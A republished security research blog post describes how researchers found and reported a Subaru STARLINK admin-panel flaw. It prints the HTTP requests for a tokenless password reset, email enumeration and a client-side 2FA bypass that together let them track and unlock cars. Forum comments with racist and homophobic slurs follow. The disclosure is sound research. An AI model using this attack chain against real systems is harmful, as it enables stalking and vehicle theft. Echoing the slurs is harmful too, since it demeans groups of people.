Disaster Hacking Subaru: Tracking and Controlling Cars via the STARLINK Admin Panel - Incompetent coders created a vulnerability that allowed anyone to remotely start, stop, lock, unlock, and retrieve the current location of any vehicle.

Thu Jan 23 2025

Introduction​

On November 20, 2024, Shubham Shah and I discovered a security vulnerability in Subaru’s STARLINK connected vehicle service that gave us unrestricted targeted access to all vehicles and customer accounts in the United States, Canada, and Japan.

Using the access provided by the vulnerability, an attacker who only knew the victim’s last name and ZIP code, email address, phone number, or license plate could have done the following:

• Remotely start, stop, lock, unlock, and retrieve the current location of any vehicle.
• Retrieve any vehicle’s complete location history from the past year, accurate to within 5 meters and updated each time the engine starts.
• Query and retrieve the personally identifiable information (PII) of any customer, including emergency contacts, authorized users, physical address, billing information (e.g., last 4 digits of credit card, excluding full card number), and vehicle PIN.
• Access miscellaneous user data including support call history, previous owners, odometer reading, sales history, and more.

After reporting the vulnerability, the affected system was patched within 24 hours and never exploited maliciously.

Proof of Concept​

Spoiler: Archive

Taking over a Subaru using only the license plate in about 10 seconds, retrieving over a years worth of location history from the vehicle


Google Maps
Map displaying 1,600 leaked coordinates from a 2023 Subaru Impreza, similar data was retrievable for any internet-connected Subaru

Vulnerability Writeup​

A little over a year ago, I bought my mom a 2023 Subaru Impreza with the promise that she would let me borrow it to try and hack it. I’d spent the last few years hunting for vulnerabilities in other automakers, but didn’t yet have the chance to look at Subaru.

While visiting home for thanksgiving this year, I took my opportunity and asked for the account login to see if I could get anywhere.

Auditing the MySubaru Mobile App​

The first thing I wanted to test was the MySubaru app. This app allowed users to send vehicle commands, so I proxied the app using Burp Suite and intercepted the telematic command HTTP requests, hoping to find a vulnerability to unlock cars without authorization.

The below request was sent when unlocking a car via the app:

POST /g2v30/service/g2/unlock/execute.json;jsessionid=AE6E4482F5C4493A79C8F3BD656F8BBA HTTP/1.1
Host: mobileapi.prod.subarucs.com
Content-Type: application/json
Connection: keep-alive
Accept: */*
User-Agent: MySubaru-PROD-SOA/2024110100 CFNetwork/1568.300.101 Darwin/24.2.0
Content-Length: 83
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br

{
  "delay": 0,
  "unlockDoorType": "ALL_DOORS_CMD",
  "vin": "4S3GTAV64P3701234",
  "pin": "1234"
}

After failing to bypass the authorization for in-app vehicle commands, I looked around the app a bit more but couldn’t find anything interesting to test. Everything seemed properly secured. There weren’t a lot of endpoints. The authorization worked really well.

Maybe testing the MySubaru app was the wrong approach.

From my past experience with car companies, I knew there could be publicly accessible employee-facing applications with broader permissions than the customer-facing apps. With that in mind, I decided to shift focus and started hunting for other Subaru-related websites to test.

Finding the Subaru Admin Panel​

I sent my friend Shubs a message over Discord to see if he’d be interested in helping me find any potential Subaru employee applications. He said sure -- and then immediately sent me this message:

shubs — 11/19/2024
have you seen this host before?
subarucs.com

He noticed that ‘my.subaru.com’ (a domain that the MySubaru app was using) was a CNAME for ‘mys.prod.subarucs.com’ (a domain that I hadn’t seen before).

nslookup my.subaru.com
Server:         127.0.0.53
Address:        127.0.0.53#53

Non-authoritative answer:
my.subaru.com   canonical name = www.mysubaru.com.
www.mysubaru.com        canonical name = mys.prod.subarucs.com.
Name:   mys.prod.subarucs.com

We ran a scan to find other subdomains and checked the output:

…
STARLINK® Admin Portal - https://portal.prod.subarucs.com/login.html
…

Well, that definitely looked like employee functionality. From a quick Google, it appeared that STARLINK was the name of Subaru’s in-vehicle infotainment system which provided all of the remote functionality for the vehicle. This appeared to be an admin panel related to it.


The Subaru STARLINK admin panel.

Arbitrary Account Takeover on Subaru STARLINK Admin Portal​

At first glance, it didn’t seem like there would be much here. It was just a login panel, and we didn’t have any credentials. I checked the source of the website hoping to see a bit more, and the following bit caught my eye:

<script type="text/javascript" src="/assets/_js/starlinkEnroll.js"></script>

There were some interesting JavaScript files under the “/assets/_js/” folder that were loaded into the login page, so I went ahead and brute forced the directory in hopes of finding other JavaScript files.

After a few minutes of running FFuF, we got a hit for a “login.js” file which the following very interesting code snippet:

$('#new_password_submit').on('click', function(e) {
    e.preventDefault();
    if($('#forgot-password-step4-form').valid()) {
        disableBtns();
        $.ajax({
            url: "/forgotPassword/resetPassword.json",
            type: "POST",
            contentType: "application/json",
            data: JSON.stringify({
                email: email,
                password: $('#new_password').val(),
                passwordConfirmation: $('#confirm_new_password').val()
            }),
            async: false
        }).done(function (response) {

It appeared that there was a “resetPassword.json” endpoint that would reset employee’s accounts without a confirmation token!

If this worked how it was written in the JavaScript, then an attacker could simply enter any valid employee email and take over their account. I sent the following POST request to confirm that the functionality was even accessible:

HTTP Request

POST /forgotPassword/resetPassword.json HTTP/1.1
Host: portal.prod.subarucs.com

{
  "email": "random@random.com",
  "password": "Example123!",
  "passwordConfirmation": "Example123!"
}

HTTP Response

HTTP/1.1 200
Content-type: application/json
Content-length: 7

“error”

It seemed to be working, we just needed to find an employee’s email address to test it on. Since this was a fairly large application, there were probably a bunch of different users, we just needed to find some way to enumerate them. I dug through the rest of the JS looking for an endpoint that might let us enumerate emails until I saw the following:

HTTP Request

GET /adminProfile/getSecurityQuestion.json?email=example@example.com HTTP/1.1
Host: portal.prod.subarucs.com

HTTP Response

HTTP/1.1 200
Content-type: application/json
Content-length: 7

{
  "error": "Invalid email"
}

The above endpoint would return the user’s security questions if their email was valid. We could use this to enumerate user accounts until we found someone that was active on this platform.

Enumerating Employee Emails​

Using LinkedIn, we did a quick search for “Subaru STARLINK” and found a few employees who appeared to be software engineers. After getting their names, we Googled and found that Subaru emails are in the following format:

[first_initial][last]@subaru.com

We tossed the few emails that we’d pieced together into the “getSecurityQuestion.json” endpoint and hit send. On the fourth attempt, we got a response back!

<label for="securityQuestionId">
  <span class="securityQuestionText">What city were you born in?</span>
</label>

The jdoe@subaru.com (redacted) email was valid! We went back to the reset password endpoint and hit send.

HTTP Request

POST /forgotPassword/resetPassword.json HTTP/1.1
Host: portal.prod.subarucs.com

{
  "email": "jdoe@subaru.com",
  "password": "Example123!",
  "passwordConfirmation": "Example123!"
}

HTTP Response

HTTP/1.1 200
Date: Wed, 20 Nov 2024 03:02:31 GMT
Content-Type: application/json
Connection: close
X-Frame-Options: SAMEORIGIN
Content-Length: 9

"success"

It worked! We tried logging in.



We had successfully taken over an employee’s account, but there was now a 2FA prompt to actually use the website. It was custom, so we tried to see if there was anything to do to bypass it.

Bypassing 2FA​

We tried the simplest thing that we could think of: removing the client-side overlay from the UI.

Match

$('#securityQuestionModal').modal('show');

Replace

//$('#securityQuestionModal').modal('show');

After removing the client-side overlay, we clicked around and the whole app seemed to function normally. All of the buttons worked, and were returning server-side data.


2FA bypassed.

Tracking My Mom for the Last Year​

The left navbar had a ton of different functionality, but the juiciest sounding one was “Last Known Location”. I went ahead and typed in my mom’s last name and ZIP code. Her car popped up in the search results. I clicked it and saw everywhere my mom had traveled the last year:

Date	Odometer	Location
11/21/2024 6:18:56 PM	14472.6	41.30136,-96.161142
11/21/2024 4:59:51 AM	14472.6	41.301402,-96.161134
11/21/2024 4:49:02 AM	14472.6	41.301286,-96.161145
…	…	…
11/02/2023 1:44:24 PM	6440.6	41.256003,-96.080627
11/01/2023 9:52:47 PM	6432.5	41.301248,-96.159951
11/01/2023 12:16:02 PM	6425.2	41.259397,-96.078775

The “Last Known Location” endpoint was more than the last location, it gave me the exact coordinates of everywhere that she had started her engine or used a telematics command over the last year. I didn’t realize this data was being collected, but it seemed that we had agreed to the STARLINK enrollment when we purchased it.

To better understand the data, I exported a year’s worth of location history from my mom’s 2023 Impreza and imported it into the Google Maps iframe below. She kindly gave her permission to share it, saying that her life is "too boring" for anyone to misuse the information.

Visualizing a Year of Subaru Location History​

Google Maps
Map displaying 1,600 leaked coordinates from a 2023 Subaru Impreza, similar data was retrievable for any internet-connected Subaru


Our STARLINK purchase agreement history, accessible from the admin panel.

There were a ton of other endpoints. One of them was a vehicle search which let you query a customer’s last name and zip code, phone number, email address, or VIN number (retrievable via license plate) and grant/modify access to their vehicle.


Retrieving street address, phone number, email, emergency contacts, authorized users, and billing information of any Subaru STARLINK customer.


The STARLINK search functionality which allows you to search via zip code and last name, VIN, email address, and phone number.

Unlocking a Friend’s Car​

After searching and finding my own vehicle in the dashboard, I confirmed that the STARLINK admin dashboard should have access to pretty much any Subaru in the United States, Canada, and Japan. We wanted to confirm that there was nothing we were missing, so we reached out to a friend and asked if we could hack her car to demonstrate that there was no pre-requisite or feature which would’ve actually prevented a full vehicle takeover.

She sent us her license plate, we pulled up her vehicle in the admin panel, then finally we added ourselves to her car.


Adding ourselves as an authorized user to our friend's Subaru to demonstrate that we could execute commands on their vehicle.

We waited a few minutes, then we saw that our account had been created successfully.



Now that we had access, I asked if they could peek outside and see if anything was happening with their car. I sent the “unlock” command. They then sent us this video.


Success!

Afterwards, she confirmed that she did not receive any notification, text message, or email after we added ourselves as an authorized user and unlocked her car.

Timeline​

• 11/20/24 11:54 PM CST: Initial report sent to SecOps email
• 11/21/24 7:40 AM CST: Initial response from Subaru team
• 11/21/24 4:00 PM CST: Vulnerability fixed, unable to reproduce
• 01/23/24 6:00 AM CST: Blog post released

Addendum​

When writing this, I had a really hard time trying to do another blog post on car hacking. Most readers of this blog already work in security, so I really don’t think the actual password reset or 2FA bypass techniques are new to anyone. The part that I felt was worth sharing was the impact of the bug itself, and how the connected car systems actually work.

The auto industry is unique in that an 18-year-old employee from Texas can query the billing information of a vehicle in California, and it won’t really set off any alarm bells. It’s part of their normal day-to-day job. The employees all have access to a ton of personal information, and the whole thing relies on trust.

It seems really hard to really secure these systems when such broad access is built into the system by default.

Thanks​

Happy (late) holidays, thanks for reading! Huge thanks to the following people for helping write and review this post:

• Gren (https://bsky.app/profile/grenlith.bsky.social)
• Ian Carroll (https://x.com/iangcarroll)
• Justin Rhinehart (https://twitter.com/sshell_)
• Joseph Thacker (https://x.com/rez0__)
• Brett Buerhaus (https://x.com/bbuerhaus)
• Maik Robert (https://x.com/xehle_)
• Joel Margolis (https://x.com/0xteknogeek)

Find me on:
twitter: https://twitter.com/samwcyo
discord: zlz

Source (Archive)

---

Top comment on Hacker News (archive):

 

[Gottahavemysips]

Gee, I wonder what region of the world the engineers hired/contracted came from? It sure would be embarrassing for really important people if it turned out to be somewhere that is apparently teeming with "elite human capital"!

 

[Aidan]

I know someone just got a new toyota, he's got to pay monthly and use a phone app to remote start it from his bedroom in the morning, there's no button on the fob.

Toyota and Subaru are some of my favorite brands and if I was into buying new cars, they'd be among the top but now they're doing highly gay shit.

I've heard Toyota has remote start FOB on some stuff but not others but don't know anyone who remote starts with anything but their phone. I don't know if it costs them money but if it does that's so dumb. I know all new Toyotas have all of this shit, too.

 

[N Space]

Toyota and Subaru are some of my favorite brands and if I was into buying new cars, they'd be among the top but now they're doing highly gay shit.

They did start doing that this year? I have driven a 2024 Crosstrek and its keyfob is just like any other.

 

[Cybertonia]

Toyota currently owns around 20% -25% of Subaru, and the influence from Toyota is becoming increasingly obvious with each Subaru model revision.

Subaru before Toyota: We will never make another STI ever again

Subaru after Toyota: The new STI will only be available with a CVT!

 

[Falcos_Commisar]

I know someone just got a new toyota, he's got to pay monthly and use a phone app to remote start it from his bedroom in the morning, there's no button on the fob.

Toyota and Subaru are some of my favorite brands and if I was into buying new cars, they'd be among the top but now they're doing highly gay shit.

The Toyota app is free for the first year, then it's $60 a year.

You don't need it at all, it's pure convenience.

Subaru has been known for absolutely idiotic connected car technology.

All carmakers are moving to this stuff as it literally prints money.

BMW now has subscriptions for heated seats for example.

 

[LifeAlert]

No refunds. If you need AI or smart technology shit in your fucking car, you are retarded beyond help. Enjoy your 4 wheel suicide machine.

 

[Falcos_Commisar]

They did start doing that this year? I have driven a 2024 Crosstrek and it's keyfob is just like any other.

That's because the Crosstrek is an older platform.

Subaru might not have added that functionality to it as their newest vehicle is the Forester at the moment.

All of this tech is used as selling points and people love it (aka tht use it one or twice a year then forget about it)

Car connectivity lets the carmaker update the infotainment system to fix bugs as needed or add features/functionality (as needed, almost never happens)

It also tracks vehicle states like the odometer, fuel remaining, tire pressure, window position, and the status of door locks.

If you don't want any of this.... Do not buy any European luxury car made after 2012 or any car or truck made after about..... 2018-2020.

Besides, your license plate is scanned and tracked automatically by passing police cars, tollway cameras and traffic cameras every day as is your phone by the cell towers and GPS and that thing is ALWAYS on you and always listening.

 

[Weapons Grade Autism]

Toyota currently owns around 20% -25% of Subaru, and the influence from Toyota is becoming increasingly obvious with each Subaru model revision. Give it time and both will be equally-susceptible to the same remote access shit.

Spoiler: PL Posting

I work for a company that works for toyota and let me tell you as someone who has access to their systems. At least half of the names that I see come up whenever I see a ticket/call is a fucking jeet. about another 1/3 is white and asian, theres a very low hispanic number as well.
Anything not customer facing to white people is usually in the back handled by H1B Jeets.

 

[SigueSigueSpergnik]

Subaru has been known for absolutely idiotic connected car technology.

A personal favourite: vehicles specced with Starlink (for anyone unfamiliar, it's basically Subaru's equivalent of OnStar) from about 2015 on were reliant on 3G phone networks for that specific function. A dumb decision, since it was known at that time that 3G networks were going to start sunsetting sometime in the next five years. That process started gathering speed in 2018 and by late 2021 was effectively complete. Even in 2018 and 2019, Subaru was still manufacturing vehicles with Starlink systems that were only capable of 3G connectivity.

Now, at this point, you might be thinking, "big fucking deal," and that's a reasonable thought - if the only effect was that Starlink stopped working. That did happen, but the way that the telematics system had been implemented meant that if Starlink couldn't see a 3G tower it would, in perpetuity, search for one at the highest possible transmit power. This happened even when the car was switched off.

The predictable end result: a fuckton of Starlink-equipped Subarus with mysteriously-dead starting batteries, a situation that wasn't helped by the cheap factory battery that had a tiny reserve capacity. Subaru naturally did everything they could to avoid responsibility for the situation, but did eventually replace the telematics unit with one that wasn't 3G-based - if the owner had an active Starlink subscription.

IIRC, a firmware update eventually disabled the 3G units so that they'd stop looking for nonexistent networks if no upgrade had been taken. The smart folks went this route.

Besides, your license plate is scanned and tracked automatically by passing police cars, tollway cameras and traffic cameras every day as is your phone by the cell towers and GPS and that thing is ALWAYS on you and always listening.

Don't forget parking, private security, and repo companies. Lots of them have MPH900s or equivalent and are not bound by the same regulations as law enforcement are when it comes to handling the data generated by LPR systems. They also operate on private property, which LEOs typically don't except on calls.

 

[Weebburner]

Theres beauty and ingenuity in simple mechanic. The more you add complexity the more prone to breakage and other issues arises (And cost). Maybe car dont need a microchip to do every single fucking thing. Maybe not everything needs to be connected to the internet.

 

[Super Guido]

I'm getting flashbacks to the death of Michael Hastings.

 

[Google.com]

Subaru fans I don't understand you, what is the appeal.

My buddy 2 years ago inhered an 8 year old forester with only 60k miles on the odometer, wanted to drive it but noticed a strange knock and went in to have it inspection. Engine had multiple oil leaks, head gasket issues and the transmission was fucked among other minor wear. Keep in mind this thing was driven by an old man who took it to the grocery store, pharmacy, doctors office, restaurants, and the Subaru dealership that's about it for 8 years it barely touched the highway even. The total repairs were more than the selling value of the car and no one would buy it, ended up getting parted out.

I have since heard Subaru's have dog shit engines from multiple people and questionable to bad build quality.

 

[VargReallyDidNothingWrong]

Keep in mind this thing was driven by an old man who took it to the grocery store, pharmacy, doctors office, restaurants, and the Subaru dealership that's about it for 8 years it barely touched the highway even. The total repairs were more than the selling value of the car and no one would buy it, ended up getting parted out.

Old person cars that are driven half a mile to the grocery store are the worst for engine and transmission wear. The parts and oil never get up to temp so there's more wear, oil suffers fuel dilution because the engine is always running cold, cold starts are the most damaging part of an engines life.

Subaru's aren't known for their reliability at the best of times but an old person owned Subaru is gonna be so much worse than one owned by a guy who commutes 45 miles to work on the highway daily, at identical mileages.

 

[Cybertonia]

Subaru fans I don't understand you, what is the appeal.

My buddy 2 years ago inhered an 8 year old forester with only 60k miles on the odometer, wanted to drive it but noticed a strange knock and went in to have it inspection. Engine had multiple oil leaks, head gasket issues and the transmission was fucked among other minor wear. Keep in mind this thing was driven by an old man who took it to the grocery store, pharmacy, doctors office, restaurants, and the Subaru dealership that's about it for 8 years it barely touched the highway even. The total repairs were more than the selling value of the car and no one would buy it, ended up getting parted out.

I have since heard Subaru's have dog shit engines from multiple people and questionable to bad build quality.

Back in the day, the first generation Impreza WRXs and second generation Legacy GTs were stupidly amazing cars that didn't cost a lot of money. It was the cheapest way to get yourself a turbocharged two liter engine without needing to pay fuck-you money to Audi or Mercedes.

But Subaru has always been a small company and like all the Japanese car companies in the 2000s & 2010s, they went through aggressive cost-cutting - including most famously switching to a single-ply headgasket in the EJ series engines during this time. Which led to the infamous MUH HEADGASKETS meme. It's a shame too because the EJ wasn't all that terrible of an engine, but it's reputation is ruined almost soley from the headgasket blunder.

But also, part of it is that Subies are huge maintenance queens that NEED to have the oil done at EXACTLY the interval due to the inherently high oil consumption that all boxers experience, and most people treat their cars in general like shit and skip oil changes and other regular maintenance, and so part of it is people blaming the car for their own negligence. A knock in an EJ engine most usually meant that someone was cheap about oil changes and ran their oil for so long of an interval that the engine probably started to experience oil starvation and spun a bearing.

At one point in time I had an "old man only drove this car to the grocery store" Subie with exactly this issue - "Oh yeah dad was so good about maintenance on this car he always got the oil done" *checks the carfax* over 10k miles between oil changes....

As far as the appeal - idk maybe some of us are just masochists with brains drenched in car nostalgia, holding out for some fictional day when Subie will say to us "you know what fuck all the fuel econ regs we're gonna start offering 6MTs in all our cars again"

The predictable end result: a fuckton of Starlink-equipped Subarus with mysteriously-dead starting batteries, a situation that wasn't helped by the cheap factory battery that had a tiny reserve capacity.

Had this 3G bug happen to me and it permanently and irreparibly damaged the battery. Fortunately at the time, that car was still under a dealership warranty.

 

[frozen_runner]

> incompetent

Sure, Jan. This is intentional so glowies have access to everything.

I know someone just got a new toyota, he's got to pay monthly and use a phone app to remote start it from his bedroom in the morning, there's no button on the fob.

Toyota and Subaru are some of my favorite brands and if I was into buying new cars, they'd be among the top but now they're doing highly gay shit.

BMW was talking a couple of years ago about requiring a monthly fee for heated seats

 

[Meat Target]

But also, part of it is that Subies are huge maintenance queens that NEED to have the oil done at EXACTLY the interval due to the inherently high oil consumption that all boxers experience, and most people treat their cars in general like shit and skip oil changes and other regular maintenance, and so part of it is people blaming the car for their own negligence. A knock in an EJ engine most usually meant that someone was cheap about oil changes and ran their oil for so long of an interval that the engine probably started to experience oil starvation and spun a bearing.

I once had to get an all-new transmission installed in my Subaru because the retards at Valvoline drained the tranny fluid instead of the oil and ruined it.

Subarus are practically designed to only be serviced at their dealerships.

 

[Cybertonia]

I once had to get an all-new transmission installed in my Subaru because the retards at Valvoline drained the tranny fluid instead of the oil and ruined it.

Subarus are practically designed to only be serviced at their dealerships.

You gotta find a good local wrench who works with lots of subies. Problem though is, outside of the northeast and the PNW where subies are everywhere, it's hard to find local garages who know how to correctly work on them.

 

[mofu mofo]

I'd rate this as 1 level below the Tesla summon hack and it's yet another reason why I don't want an internet connected car. All it does for me is increase the attack surface. We've already got chavs who've worked out how to hack the canbus on certain cars so they can unlock and start them via the plug for the headlight unit.

Keep in mind this thing was driven by an old man who took it to the grocery store, pharmacy, doctors office, restaurants, and the Subaru dealership that's about it for 8 years it barely touched the highway even

It may be counterintuitive to some but that driving cycle is actually extremely bad for ICE, especially diesels. They like to get thoroughly warmed up so highway miles are best miles. Here's a quote from VW:

If you've got a modern diesel (late 2000s onwards) and all you do is go a couple of miles to the shops, you'll fill the intake up with shit from the EGR system.

 

[SigueSigueSpergnik]

But Subaru has always been a small company and like all the Japanese car companies in the 2000s & 2010s, they went through aggressive cost-cutting - including most famously switching to a single-ply headgasket in the EJ series engines during this time. Which led to the infamous MUH HEADGASKETS meme. It's a shame too because the EJ wasn't all that terrible of an engine, but it's reputation is ruined almost soley from the headgasket blunder.

Subaru was also glacially-slow to respond to the EJ25's problems in any sort of effective manner. IIRC, first year for that engine was around 1996; the same basic head gasket design was used until about 2008 or so. There have been revisions since then, but years of them claiming that the problem came down to not using the special Subaru coolant (which was basically the regular coolant with added stop-leak) when the vehicles didn't leave the factory with it installed was just bullshit. Between that and the exhaust valves on (usually) the #4 cylinder also having a penchant for burning and chipping, I'm honestly amazed that they a) survived that motor's flaws and b) still have it in production nearly 30 years later.

Agreed that it wasn't a bad motor on paper, and when it was working it was decent for what it was. But in terms of bulletproof longevity, it was no EA81, and even the early EA82 timing belt issues weren't as ubiquitous as the EJ25 head leaks.

Subarus are practically designed to only be serviced at their dealerships.

That's pretty much everything made in the past 20 years, but especially the last 10; it's not just a Subaru problem. The dependence on manufacturer-specific software to perform things like brake bleeds, windshield wiper replacements (yes, really), and even oil changes is what drives me batshit: you can have an FSM to hand and still not be able to perform or finish certain tasks without a tablet and interface. It's idiotic.

If you've got a modern diesel (late 2000s onwards) and all you do is go a couple of miles to the shops, you'll fill the intake up with shit from the EGR system.

It'll do that even on long runs given enough time. Implementing gasoline-style EGR systems on diesels was one of the stupidest decisions ever taken by vehicle manufacturers, though to be fair it was a design that was essentially forced on them by various emissions mandates. Still, they should've pushed back harder against it and recommended alternative methods of eliminating soot from the exhaust, but the fuckwit who decided that EGR was the answer deserves a good kicking.

 

[Google.com]

Old person cars that are driven half a mile to the grocery store are the worst for engine and transmission wear.

I wasn't aware of this to be completely honest. It was more than half a mile for sure though probably 5ish each trip. But I asked my buddy about it and apparently it was serviced at 50k and they reported no trouble with it after some work was done in the throttle body. I just find any car falling apart at 60k like that insane baring any major incident.